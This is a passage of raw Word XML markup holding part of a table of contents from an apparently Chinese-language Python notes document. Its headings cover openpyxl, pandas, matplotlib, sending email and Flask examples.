              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779995 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>538</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D0BB257" w14:textId="1562EA9D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779996" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用字典格式的数据：有标题行才能使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779996 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>539</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54C5971C" w14:textId="7DC0EBF9" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779997" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>openpyxl:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读写</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>xlsx</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779997 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>540</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B42EF67" w14:textId="1484A2DA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779998" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>panda</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779998 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>541</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11E72148" w14:textId="6020FE9B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779999" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>csv</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据合并</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>541</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AF478FB" w14:textId="3029DF31" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780000" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>excel</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>读写</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>541</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3FD22D5E" w14:textId="6DDA9E5F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780001" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>matplotlib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>542</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D235679" w14:textId="2747781F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780002" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>email</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：发送邮件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>542</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FB94C4D" w14:textId="7C58F643" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780003" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>参考鹏哥提供的代码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>542</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12B118FE" w14:textId="1969E77B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780004" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>有群发、设置发件人收件人的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>543</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F1874C8" w14:textId="65F3C1CD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780005" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>我重新修改后的可以命令行传参的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mail</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>545</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5844F273" w14:textId="224F2B54" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780006" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780006 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>547</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6815FECA" w14:textId="4B378247" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780007" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>希望获取更新版本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780007 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>547</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EDC837F" w14:textId="6E5BEFDC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780008" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>样例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780008 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>548</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CAD5921" w14:textId="1DCC39CD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780009" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>swagger</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>样例</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>551</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01413776" w14:textId="3E99C255" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780010" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>jsonify:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>快速生成</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>json</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>数据</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DF94FA2" w14:textId="088D8692" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780011" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>渲染前端</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>552</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2070C250" w14:textId="50F87BA5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780012" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>flask</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
